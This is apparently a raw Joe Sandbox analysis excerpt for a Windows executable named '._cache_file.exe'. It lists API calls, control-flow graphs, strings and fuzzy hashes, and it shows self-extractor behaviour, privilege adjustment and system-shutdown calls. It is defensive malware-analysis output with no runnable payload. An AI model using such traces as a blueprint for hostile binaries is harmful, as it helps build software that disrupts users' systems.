                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004672
                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004682
                                                                                              • DecryptFileA.ADVAPI32(?,00000000), ref: 01004695
                                                                                              • GetLastError.KERNEL32 ref: 0100469B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AddressAttributesDecryptErrorLastLibraryLoadProc
                                                                                              • String ID: DecryptFileA$advapi32.dll
                                                                                              • API String ID: 82924815-2381948369

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetDriveTypeA.KERNELBASE(?), ref: 01002B43
                                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 01002B75
                                                                                              • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 01002B95
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01002BA8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceDriveFileHandleType
                                                                                              • String ID: ?:\$\\.\?:
                                                                                              • API String ID: 3103408351-3307214488

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,10000000,00000000), ref: 01003040
                                                                                              • ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 01003073
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 010030A2
                                                                                              • ReadFile.KERNELBASE(?,00005A4D,000000F8,?,00000000), ref: 010030CA
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00040000), ref: 01003129
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 0100314A
                                                                                              • ReadFile.KERNEL32(?,00000000,00040000,?,00000000), ref: 0100316B
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010032F5
                                                                                              • HeapAlloc.KERNEL32(00000008,00000000), ref: 0100331A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0100333C
                                                                                              • GetEnvironmentVariableA.KERNEL32(?,00000000,00000000), ref: 01003346
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01003364
                                                                                              • HeapAlloc.KERNEL32(00000008,00000000), ref: 01003381
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 010033A0
                                                                                              • SetEnvironmentVariableA.KERNEL32(?,00000000), ref: 010033A9
                                                                                              • CloseHandle.KERNELBASE(?), ref: 010033C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharMultiWide$HeapRead$AllocEnvironmentPointerVariable$AllocateCloseCreateHandle
                                                                                              • String ID: PE
                                                                                              • API String ID: 1909040894-4258593460

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\._cache_file.exe,00000104), ref: 01004025
                                                                                              • GetCommandLineA.KERNEL32 ref: 01004060
                                                                                              • GetFileAttributesA.KERNELBASE(To Directory:), ref: 01004223
                                                                                              • _strnicmp.MSVCRT ref: 0100433B
                                                                                              • _strnicmp.MSVCRT ref: 01004372
                                                                                              • _strnicmp.MSVCRT ref: 01004450
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strnicmp$File$AttributesCommandLineModuleName
                                                                                              • String ID: C:\Users\user\Desktop\._cache_file.exe$Extracting File:$To Directory:$extract$extract:$integrate$passive$quiet
                                                                                              • API String ID: 3875041768-1987711336

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 678 10028d9-100291c SetErrorMode * 2 GetTickCount 679 100291e-1002952 sprintf CreateDirectoryA 678->679 680 1002954-100295f GetLastError 679->680 681 1002975-1002984 RemoveDirectoryA 679->681 682 10029a0-10029ba SetErrorMode call 10062ff 680->682 683 1002961-1002971 680->683 684 1002996 681->684 685 1002986-1002990 MoveFileExA 681->685 683->679 686 1002973 683->686 684->682 685->684 686->682
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00000000), ref: 01002901
                                                                                              • SetErrorMode.KERNELBASE(00000000), ref: 0100290D
                                                                                              • GetTickCount.KERNEL32 ref: 0100290F
                                                                                              • sprintf.MSVCRT ref: 01002937
                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000), ref: 0100294A
                                                                                              • GetLastError.KERNEL32 ref: 01002954
                                                                                              • RemoveDirectoryA.KERNELBASE(?), ref: 0100297C
                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 01002990
                                                                                              • SetErrorMode.KERNELBASE(?), ref: 010029A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$Directory$CountCreateFileLastMoveRemoveTicksprintf
                                                                                              • String ID: %s_%06u_
                                                                                              • API String ID: 2138407651-2224866286
                                                                                              • Opcode ID: 605b290757ffbc819f70990fed8fb14aff114087cd0563a7a2d4703900c9114f
                                                                                              • Instruction ID: 2b5bf619bf93649879f906ab2fef4dd1de3e953bea1c10fa8e68832a185b186a
                                                                                              • Opcode Fuzzy Hash: 605b290757ffbc819f70990fed8fb14aff114087cd0563a7a2d4703900c9114f
                                                                                              • Instruction Fuzzy Hash: AC2162719002189BEB22DB64CC4DBDA77BEEB54341F0040A6E685E2181D7B99A84CFA1

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 689 10037bf-10037d7 GetEnvironmentVariableA 690 100388a-100388c 689->690 691 10037dd-1003815 call 1002bc4 CreateFileA 689->691 694 1003817-1003861 WriteFile 691->694 695 1003889 691->695 696 1003863-1003866 694->696 697 1003876-1003882 CloseHandle 694->697 695->690 696->697 698 1003868-1003874 SetEnvironmentVariableA 696->698 697->695 698->695
                                                                                              APIs
                                                                                              • GetEnvironmentVariableA.KERNEL32(_SFX_CAB_SHUTDOWN_REQUEST,00000000,00000000), ref: 010037CF
                                                                                              • CreateFileA.KERNELBASE(c:\36a8a8e2fed651ec27d1eed188bb35\$shtdwn$.req,C0000000,00000003,00000000,00000001,04000002,00000000), ref: 01003804
                                                                                              • WriteFile.KERNELBASE(00000000,Sdwn,00000314,?,00000000), ref: 01003858
                                                                                              • SetEnvironmentVariableA.KERNEL32(_SFX_CAB_SHUTDOWN_REQUEST,c:\36a8a8e2fed651ec27d1eed188bb35\$shtdwn$.req), ref: 0100386E
                                                                                              • CloseHandle.KERNEL32 ref: 0100387C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileVariable$CloseCreateHandleWrite
                                                                                              • String ID: $shtdwn$.req$Sdwn$_SFX_CAB_SHUTDOWN_REQUEST$c:\36a8a8e2fed651ec27d1eed188bb35$c:\36a8a8e2fed651ec27d1eed188bb35\$shtdwn$.req
                                                                                              • API String ID: 510931695-3818779472
                                                                                              • Opcode ID: 74f9ad3b8f2023380f4faa6e9c0d97565d17dc7302695f93730564ca81c6b899
                                                                                              • Instruction ID: b0220b2b77477a676319b82448efaae5af67ee2cc9e6961861700f30aa540367
                                                                                              • Opcode Fuzzy Hash: 74f9ad3b8f2023380f4faa6e9c0d97565d17dc7302695f93730564ca81c6b899
                                                                                              • Instruction Fuzzy Hash: C8116D71604340ABF7338B9AAD4DF473AA9F786764F1043A9F1C1A61C8D7765641C770

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 718 10063ff-1006414 call 10065b8 721 1006416-1006425 718->721 722 100643e-1006442 718->722 721->722 723 1006427-1006434 721->723 724 100646e-10064bd __set_app_type __p__fmode __p__commode call 1003783 722->724 726 1006436-100643c 723->726 727 1006457-100645e 723->727 731 10064cb-1006529 call 10065a1 _initterm __getmainargs _initterm call 1005e92 724->731 732 10064bf-10064ca __setusermatherr 724->732 726->722 729 1006444-100644b 726->729 727->722 730 1006460-1006462 727->730 729->722 733 100644d-1006455 729->733 734 1006468-100646b 730->734 738 100652e-100653a 731->738 732->731 733->734 734->724 739 1006543-1006583 _cexit call 10065f3 738->739 740 100653c-100653d exit 738->740 740->739
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 1729372338-0
                                                                                              • Opcode ID: 6af886278659cd1f87929ba10df1e95ca34e58862df1f3af71c4c3f27de72d1c
                                                                                              • Instruction ID: 599c4623493fcb82760b158fed09b41a5123095cb67496b16860643f61b92bca
                                                                                              • Opcode Fuzzy Hash: 6af886278659cd1f87929ba10df1e95ca34e58862df1f3af71c4c3f27de72d1c
                                                                                              • Instruction Fuzzy Hash: 3B315874940205DFEB27DFA4D44CAEC77B2FB18312F10816AF196A62D8DB3B4A54CB21

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 775 1003c0f-1003c35 CreateFileA 776 1003c37-1003c38 call 1003892 775->776 777 1003c3d-1003c52 SetFilePointer 775->777 776->777
                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,08000000,00000000), ref: 01003C2A
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000), ref: 01003C48
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateCriticalDeleteErrorExitLastLoadMessagePointerProcessSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 1911058658-0
                                                                                              • Opcode ID: 3db09fa30688c6ade57452f90a721c5f0e3047f88a1d14363bbe33cf621a1cff
                                                                                              • Instruction ID: f747d1a96e7ed0c96837ae8def0cda9aa80c9c8a6c6ac268114b6baa7651c347
                                                                                              • Opcode Fuzzy Hash: 3db09fa30688c6ade57452f90a721c5f0e3047f88a1d14363bbe33cf621a1cff
                                                                                              • Instruction Fuzzy Hash: 8EE086313803247BF5332669AC0EF8579099701B71F204251FB58BA1C0C6A56A40C798

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 779 1003c87-1003c93 780 1003c95-1003c9d 779->780 781 1003cdc-1003cf3 WriteFile 779->781 782 1003ca2-1003cd6 780->782 783 1003c9f 780->783 784 1003cf5-1003cfc call 1003892 781->784 785 1003cd7-1003cdb 781->785 782->785 783->782
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(DADAFEED,?,?,?,00000000), ref: 01003CEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 64d857ce796dace06822de0efcd78285d4c1ff5c9f778fdfecebaa5c7ebed988
                                                                                              • Instruction ID: 8ed4801c38d92fe31a950a2119f22d7affeb1643a363de039ab70ebeba9e11e9
                                                                                              • Opcode Fuzzy Hash: 64d857ce796dace06822de0efcd78285d4c1ff5c9f778fdfecebaa5c7ebed988
                                                                                              • Instruction Fuzzy Hash: 60012C3120024DAFDB12CFADD800AEA77E9FB58320F448969FA68C7190D779D951CB50

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 788 1004590-10045aa 789 10045ac-10045af 788->789 790 10045dd-10045e3 788->790 791 10045b1-10045c0 CreateDirectoryA 789->791 792 10045d7-10045db 789->792 793 10045c2-10045cd call 100447f 791->793 794 10045d4 791->794 792->789 792->790 793->794 794->792
                                                                                              APIs
                                                                                              • CreateDirectoryA.KERNELBASE(?,?), ref: 010045B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 4241100979-0
                                                                                              • Opcode ID: a9c93d86d7b1e126657db29aee2ea8a09b01b806f2212d3dabd863b7a028eda3
                                                                                              • Instruction ID: 9cc6a4ee66b41767d7bcf1e787c71929ede8fd294d86324cd45e64105ddf3fa1
                                                                                              • Opcode Fuzzy Hash: a9c93d86d7b1e126657db29aee2ea8a09b01b806f2212d3dabd863b7a028eda3
                                                                                              • Instruction Fuzzy Hash: 7CF0B431500385AEFB334F29C804BAABFD89F91751F28809DFAC4CA582D7B58590C7A5

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 797 1003c58-1003c74 ReadFile 798 1003c76-1003c78 call 1003892 797->798 799 1003c7d-1003c81 797->799 798->799
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 01003C6C
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteErrorExitFileLastLoadMessageProcessReadSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 896096512-0
                                                                                              • Opcode ID: c5cd25c055f1176644a0d9d6a050eae1adbf6e77802f162c6b8565da1953186c
                                                                                              • Instruction ID: b5e608f67cd8aa0ec7224ba8d194bf05f248ddf814a44386e79e7048d07bb6a0
                                                                                              • Opcode Fuzzy Hash: c5cd25c055f1176644a0d9d6a050eae1adbf6e77802f162c6b8565da1953186c
                                                                                              • Instruction Fuzzy Hash: EED0173210034DBFDF129E95CC08EAA3B6DFF44220F084514BA7889090D732D520CB51
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 01002C9B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: d8d5cd754932263745f338520652626db3bdb25572505ccd5790d85f059cf7dc
                                                                                              • Instruction ID: 4670c305a0b7d71b77fc1b6fc64dcd010d39b6e931a86f05cad5b7c8d19ffb63
                                                                                              • Opcode Fuzzy Hash: d8d5cd754932263745f338520652626db3bdb25572505ccd5790d85f059cf7dc
                                                                                              • Instruction Fuzzy Hash: 8CD01731100208AFEB22CF48DD09FAA7BA9FB40314F058254F99C86195C776A9A4DB80
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?), ref: 01003BF7
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              APIs
                                                                                              • DialogBoxParamA.USER32(00000064,00000000,01002E53,00000000), ref: 01003952
                                                                                                • Part of subcall function 01003892: GetLastError.KERNEL32 ref: 010038A6
                                                                                                • Part of subcall function 01003892: LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                                • Part of subcall function 01003892: MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                                • Part of subcall function 01003892: DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                                • Part of subcall function 01003892: ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              APIs
                                                                                              • OpenEventA.KERNEL32(00100000,00000000,WFP_IDLE_TRIGGER), ref: 010039AD
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 0100348A
                                                                                                • Part of subcall function 0100346E: CreateFileA.KERNEL32(0100CD00,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,010038D5,?,?,00000200,?), ref: 010034B4
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 010034DE
                                                                                              • WaitForSingleObject.KERNEL32(00000000,0000EA60,Shutdown Initiated in Self Extractor ), ref: 010039C9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 010039D0
                                                                                              • Sleep.KERNEL32(00002710,Shutdown Initiated in Self Extractor ), ref: 010039E9
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 01003A1F
                                                                                              • GetProcAddress.KERNEL32(00000000,InitiateSystemShutdownExA), ref: 01003A35
                                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 01003A48
                                                                                              • InitiateSystemShutdownA.ADVAPI32(00000000,00000000,00000000,?,?), ref: 01003A8B
                                                                                              • GetLastError.KERNEL32 ref: 01003A9B
                                                                                              • WaitForSingleObject.KERNEL32(00000BB8), ref: 01003ABB
                                                                                              • GetLastError.KERNEL32 ref: 01003ACD
                                                                                              • GetVersionExA.KERNEL32(?,?), ref: 01003B0C
                                                                                              • GetVersionExA.KERNEL32(00000094), ref: 01003B2C
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01003B43
                                                                                              • strchr.MSVCRT ref: 01003B56
                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,02000000,00000000), ref: 01003B78
                                                                                              • FlushFileBuffers.KERNEL32(00000000), ref: 01003B86
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01003B8F
                                                                                              • NtShutdownSystem.NTDLL ref: 01003B9B
                                                                                              • FreeLibrary.KERNEL32(?), ref: 01003BB2
                                                                                              Strings
                                                                                              • ShutdownSystem: Failed , xrefs: 01003BC8
                                                                                              • InitiateSystemShutdown() Failed with error 0x%lx , xrefs: 01003AD0
                                                                                              • InitiateSystemShutdownExA, xrefs: 01003A2F
                                                                                              • advapi32.dll, xrefs: 01003A1A
                                                                                              • Failed to Adjust ENABLE_PRIVILEGE , xrefs: 01003A09
                                                                                              • @, xrefs: 01003B2E
                                                                                              • Shutdown Initiated in Self Extractor , xrefs: 010039B3
                                                                                              • WFP_IDLE_TRIGGER, xrefs: 01003984
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              APIs
                                                                                              • NtOpenProcessToken.NTDLL(000000FF,00000028,?), ref: 010035A1
                                                                                              • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 010035C1
                                                                                              • NtClose.NTDLL ref: 010035CE
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 0100348A
                                                                                                • Part of subcall function 0100346E: CreateFileA.KERNEL32(0100CD00,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,010038D5,?,?,00000200,?), ref: 010034B4
                                                                                                • Part of subcall function 0100346E: CloseHandle.KERNEL32(FFFFFFFF,?,?,?,010038D5,?,?,00000200,?), ref: 010034DE
                                                                                              Strings
                                                                                              • RestorePrivilege(): Failed To Restore Privilege , xrefs: 010035D9
                                                                                              • RestorePrivilege():Failed To Open Process Token, xrefs: 010035AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              APIs
                                                                                              • NtOpenProcessToken.NTDLL(000000FF,00000028,?), ref: 0100352E
                                                                                              • NtAdjustPrivilegesToken.NTDLL(?,00000000,00000000,00000000,00000000,?), ref: 01003561
                                                                                              • NtClose.NTDLL ref: 0100356E
                                                                                              • NtClose.NTDLL ref: 01003579
                                                                                              Strings
                                                                                              • NtOpenProcessToken Failed , xrefs: 01003538
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmp
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 010063CE
                                                                                              • UnhandledExceptionFilter.KERNEL32(010025D8), ref: 010063D9
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 010063EA
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 010063F1
                                                                                              Memory Dump Source
